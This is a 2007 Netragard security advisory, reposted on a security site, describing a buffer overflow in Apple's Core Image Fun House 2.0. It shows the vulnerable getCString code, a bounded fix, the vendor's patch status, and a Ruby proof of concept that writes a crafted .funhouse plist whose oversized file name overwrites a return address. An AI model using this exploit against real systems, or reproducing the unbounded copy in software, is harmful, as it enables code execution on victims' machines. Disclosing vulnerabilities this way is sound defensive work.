Apple Core Image Fun House <= 2.0 OS X -- Arbitrary Code Execution

Advisory Content :

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

*************************** NETRAGARD ADVISORY ***********************
http://www.netragard.com
"We make IT Safe"

[Advisory Summary]
- ----------------------------------------------------------------------
Advisory Author : Adriel T. Desautels
Researcher : Kevin Finisterre
Advisory ID : NETRAGARD-20070628
Product Name : Core Image Fun House
Product Version : <= 2.0 OS X
Vendor Name : http://www.apple.com
Type of Vulnerability : Buffer Overflow
Effort (1-10 where 1 == easy) : 5
Impact : Arbitrary Code Execution
Vendor Notified : Yes
Patch Released : N/A
Discovery Date : 07/10/2007

[POSTING NOTICE]
- ----------------------------------------------------------------------
If you intend to post this advisory on your web-site you must provide
a clickable link back to http://www.netragard.com as the contents of
this advisory may be updated without notice.

[Product Description]
- ----------------------------------------------------------------------
"From creating new solutions for print, photography, scientific
visualization, and film post-production to enhancing your
application's
user interface with innovative and effortless visual effects, Core Image
performs the heavy lifting that enables the next generation of imaging
applications."

- -- http://developer.apple.com/macosx/coreimage.html --

[Technical Summary]
- ----------------------------------------------------------------------
It is possible to trigger an exploitable buffer overflow condition
by creating a specially crafted .funhouse file.

[Technical Details]
- ----------------------------------------------------------------------
The Funhouse application does not properly parse XML data.
Specifically it is possible to create a specially crafted .funhouse
file that will trigger and exploit a buffer overflow condition. The
code responsible for the condition is as follows:

// render origin handles using AppKit directly
- - (CIImage *)drawPoints:(CIImage *)im
{
...
~ NSString *str, *str2, *localizedParameter;
...

~ else if ([type isEqualToString:@"image"])
~ {
~ // image effect stack element
~ // show an image origin (in its center)
~ CGRect r = [[es imageAtIndex:i] extent];
~ NSPoint offset = [es offsetAtIndex:i];
~ pt.x = offset.x + (r.origin.x + r.size.width * 0.5);
~ pt.y = offset.y + (r.origin.y + r.size.height * 0.5);
~ str = [[es filenameAtIndex:i] stringByAppendingString:@"
center"];
~ [self drawPoint:pt label:str intoContext:cg];
~ }

}

The following code is called by the code referenced above:

/*
~ Drawing
*/

// draw an onscreen handle for an image origin, text origin, or filter
point
// the handle is a "center symbol" - a circle with crosshairs through it.
// the handle is labelled with the string "str".
// all items are "shadowed"
- - (void)drawPoint:(NSPoint)pt label:(NSString *)str
intoContext:(CGContextRef)cg
{
...
~ char cstr[256];
...
~ if (!movingNow)
~ {
~ [str getCString:cstr]; <-- Vulnerability Exists Here

[Fix]
- ----------------------------------------------------------------------
To fix the issue the [str getCString:cstr]; needs to be replaced with
[str getCString:cstr maxLength:254]; to prevent overflows.

- - [str getCString:cstr];
+ [str getCString:cstr maxLength:254];

[Proof Of Concept]
- ----------------------------------------------------------------------
#!/usr/bin/ruby
# Copyright (c) Netragard, LLC. adriel (at) netragard (dot) com [email
concealed]
#
# /Developer/Applications/Graphics Tools/Core Image Fun House.app
# /Contents/MacOS/Core Image Fun House
#
# (gdb) x/10s 0xbfffddf7
# 0xbfffddf7: 'Z' <repeats 101 times>, "DCBA center"
#
# 2007-07-10 21:15:34.573 Core Image Fun House[1061] CFLog (0):
# CFPropertyListCreateFromXMLData(): plist parse failed;
# the data is notproper UTF-8. The file name for this data
# could be:
$
# /Users/test/Desktop/SuperTastey.funhouse/file.xml
# The parser will retry as in 10.2, but the problem should be
# corrected in the plist.
#
# \x80-\xFF range that do not form proper utf8

len = 300
fname = "SuperTastey"
retaddr = 0x0d0d0d0d # There are lots of filtered chars!

if File.exist?(fname + ".funhouse/file.xml")
File.unlink(fname + ".funhouse/file.xml")
Dir.rmdir(fname + ".funhouse")
end
Dir.mkdir(fname + ".funhouse")

FUNSTUFF =
"<?xml version=\"1.0\" encoding=\"UTF-8\"?>" +
"<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\"
\"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">" +
"<plist version=\"1.0\">" +
"<dict>" +
"<key>layers</key>" +
"<array>" +
"<dict>" +
"<key>file</key>" +
"<string>" +
"Z" * len + [retaddr].pack("V") +
"</string>" +
"<key>offsetX</key>" +
"<real>0.0</real>" +
"<key>offsetY</key>" +
"<real>0.0</real>" +
"<key>type</key>" +
"<string>image</string>" +
"</dict>" +
"<dict>" +
"<key>classname</key>" +
"<string>CIGlassDistortion</string>" +
"<key>type</key>" +
"<string>filter</string>" +
"<key>values</key>" +
"<dict>" +
"<key>inputCenter_CIVectorValue</key>" +
"<string>[150 150]</string>" +
"<key>inputScale</key>" +
"<real>200</real>" +
"<key>inputTexture</key>" +
"<string>" +
"Z" * 50000 +
"</string>" +
"</dict>" +
"</dict>" +
"</array>" +
"</dict>" +
"</plist>" + "\n"

target_file = File.open("SuperTastey.funhouse/file.xml", "w+") { |f|
~ f.print(FUNSTUFF) # weeeeee... lets have fun.
~ f.close
}

[Vendor Status]
- ----------------------------------------------------------------------
Vendor Notified

[Vendor Comments]
- ----------------------------------------------------------------------
This issue is addressed in Xcode tools 3.1. Credit to Kevin
Finisterre of Netragard for reporting this issue to Apple. Further
information is available at:

http://support.apple.com/kb/HT1222

[Disclaimer]
- ----------------------http://www.netragard.com------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit
business.

<a href="http://www.netragard.com>
http://www.netragard.com
</a>

[Netragard Whitepaper Downloads]
- ----------------------------------------------------------------------
Choosing the right provider : http://tinyurl.com/2ahk3j
Three Things you must know : http://tinyurl.com/26pjsn

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (Darwin)

iD8DBQFId6ijQwbn1P9Iaa0RAoLpAJ94J7P/GGI+fr4P3UlORkG7v6xWEwCePG6n
Tk3RLUnGHHdl6WHLzaoY07U=
=MJZy
-----END PGP SIGNATURE-----

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason

Apple Core Image Fun House <= 2.0 OS X -- Arbitrary Code Execution